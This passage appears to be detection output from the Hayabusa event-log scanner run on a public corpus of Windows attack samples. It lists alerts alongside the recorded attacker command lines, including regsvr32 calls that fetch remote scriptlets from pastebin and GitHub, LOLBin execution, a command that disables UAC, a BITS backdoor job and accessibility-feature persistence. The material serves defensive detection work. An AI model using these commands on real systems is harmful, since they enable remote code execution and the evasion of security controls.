C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx +2019-05-12 23:18:09.589 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx +2019-05-12 23:18:09.589 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx +2019-05-13 02:01:43.391 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx +2019-05-13 02:01:50.781 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\pcalua.exe"" -a c:\Windows\system32\calc.exe : Path: C:\Windows\System32\pcalua.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx +2019-05-13 02:01:51.007 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\pcalua.exe"" -a 
c:\Windows\system32\calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx +2019-05-13 02:01:51.007 +09:00,IEWIN7,1,low,Indirect Command Execution,,rules/sigma/process_creation/win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx +2019-05-13 02:09:02.275 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx +2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Code Execution via Pcwutl.dll,,rules/sigma/process_creation/win_susp_pcwutl.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx +2019-05-13 02:09:02.275 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_rundll32_pcwutl_LaunchApplication.evtx +2019-05-13 02:20:01.980 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-13 02:20:31.183 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 11 -p c:\Windows\system32\calc.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-13 02:20:49.443 +09:00,IEWIN7,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\ftp.exe"" -s:c:\users\ieuser\appdata\local\temp\ftp.txt",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-13 02:20:49.443 +09:00,IEWIN7,1,medium,Suspicious ftp.exe,,rules/sigma/process_creation/win_susp_ftp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-13 02:20:49.458 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\system32\calc.exe : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\cmd.exe /C c:\Windows\system32\calc.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_ftp.evtx +2019-05-13 03:04:50.121 +09:00,IEWIN7,59,informational,Bits Job Creation,Job Title: backdoor : URL: C:\Windows\system32\cmd.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx +2019-05-13 03:35:05.155 +09:00,IEWIN7,1,informational,Process Creation,"Command: regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Regsvr32 
Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-13 03:35:05.155 +09:00,IEWIN7,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-13 03:35:05.780 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-13 03:35:06.562 +09:00,IEWIN7,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_lobin_regsvr32_sct.evtx +2019-05-13 03:48:52.219 +09:00,IEWIN7,1,informational,Process Creation,"Command: jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll : Path: C:\ProgramData\jabber.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx +2019-05-13 03:48:52.766 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: jabber.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA .\jabber.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_renamed_regsvr32_scrobj.evtx +2019-05-13 23:50:59.389 +09:00,IEWIN7,59,informational,Bits Job Creation,Job Title: hola : URL: 
C:\Windows\system32\cmd.exe,rules/hayabusa/default/events/BitsClientOperational/59_BITS-Jobs_BitsJobCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_bitsadmin_Microsoft-Windows-Bits-Client-Operational.evtx +2019-05-14 03:02:49.160 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\mobsync.exe -Embedding : Path: C:\Windows\System32\mobsync.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:19.681 +09:00,IEWIN7,1,informational,Process Creation,Command: /c notepad.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:19.681 +09:00,IEWIN7,1,informational,Process Creation,Command: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll : Path: C:\Windows\System32\regsvr32.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Regsvr32 Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:19.895 +09:00,IEWIN7,1,informational,Process 
Creation,Command: notepad.exe : Path: C:\Windows\System32\notepad.exe : User: IEWIN7\IEUser : Parent Command: /c notepad.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:03:21.212 +09:00,IEWIN7,3,high,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 03:05:18.692 +09:00,IEWIN7,1,informational,Process Creation,Command: wmiadap.exe /F /T /R : Path: C:\Windows\System32\wbem\WMIADAP.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx +2019-05-14 10:29:04.306 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\mshta.exe -Embedding : Path: C:\Windows\System32\mshta.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,MSHTA Spwaned by SVCHOST,,rules/sigma/process_creation/win_lethalhta.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx +2019-05-14 11:32:48.290 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /groups : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.290 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.290 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.290 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.359 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /groups : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.359 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.359 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:48.359 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.143 +09:00,IEWIN7,1,informational,Process Creation,Command: consent.exe 968 288 03573528 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.453 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.453 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.470 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.470 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.487 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.487 +09:00,IEWIN7,1,informational,Process Creation,Command: consent.exe 968 312 0197CDB0 : Path: C:\Windows\System32\consent.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.487 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.814 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\sysprep\sysprep.exe"" : Path: C:\Windows\System32\sysprep\sysprep.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.831 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\sysprep\sysprep.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 11:32:51.831 +09:00,IEWIN7,1,low,Non Interactive 
PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx +2019-05-14 23:04:05.697 +09:00,alice.insecurebank.local,11,high,Hijack Legit RDP Session to Move Laterally,,rules/sigma/file_event/sysmon_tsclient_filewrite_startup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx +2019-05-15 02:17:26.440 +09:00,alice.insecurebank.local,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-15 02:17:26.738 +09:00,alice.insecurebank.local,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx +2019-05-15 13:18:40.474 +09:00,IEWIN7,13,high,Office Security Settings Changed,,rules/sigma/registry_event/sysmon_reg_office_security.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_sysmon_13_VBA_Security_AccessVBOM.evtx +2019-05-16 10:31:36.426 +09:00,DC1.insecurebank.local,1,informational,Process Creation,Command: C:\Windows\system32\WinrsHost.exe -Embedding : Path: C:\Windows\System32\winrshost.exe : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx +2019-05-16 10:31:36.454 +09:00,DC1.insecurebank.local,1,informational,Process Creation,Command: C:\Windows\system32\cmd.exe /C ipconfig : Path: C:\Windows\System32\cmd.exe : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\WinrsHost.exe 
-Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx +2019-05-16 10:31:36.456 +09:00,DC1.insecurebank.local,1,informational,Process Creation,Command: ipconfig : Path: C:\Windows\System32\ipconfig.exe : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\cmd.exe /C ipconfig,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_winrm_exec_sysmon_1_winrshost.evtx +2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: Lateral Movement - Windows Remote Management : Command: ""C:\Windows\system32\HOSTNAME.EXE"" : Path: C:\Windows\System32\HOSTNAME.EXE : User: insecurebank\Administrator : Parent Command: C:\Windows\system32\wsmprovhost.exe -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx +2019-05-16 10:38:19.630 +09:00,DC1.insecurebank.local,1,medium,Remote PowerShell Session Host Process (WinRM),,rules/sigma/process_creation/win_remote_powershell_session_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_PowershellRemoting_sysmon_1_wsmprovhost.evtx +2019-05-16 23:17:15.762 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1112,technique_name=Modify Registry : Command: reg add hklm\software\microsoft\windows\currentversion\policies\system /v EnableLUA /t REG_DWORD /d 0x0 /f : Path: C:\Windows\System32\reg.exe : User: insecurebank\Administrator : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_UAC_Disabled_Sysmon_12_13.evtx +2019-05-17 01:08:34.867 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule 
Alert,"Rule: technique_id=T1015,technique_name=Accessibility Features : Command: ""C:\Windows\System32\osk.exe"" : Path: C:\Windows\System32\osk.exe : User: NT AUTHORITY\SYSTEM : Parent Command: utilman.exe /debug",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1033,technique_name=System Owner/User Discovery : Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\System32\osk.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-17 01:08:40.360 +09:00,DC1.insecurebank.local,1,high,Whoami Execution Anomaly,,rules/sigma/process_creation/win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_accessibility_features_osk_sysmon1.evtx +2019-05-19 02:16:08.348 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.176 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.208 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.223 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx +2019-05-19 02:16:16.255 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
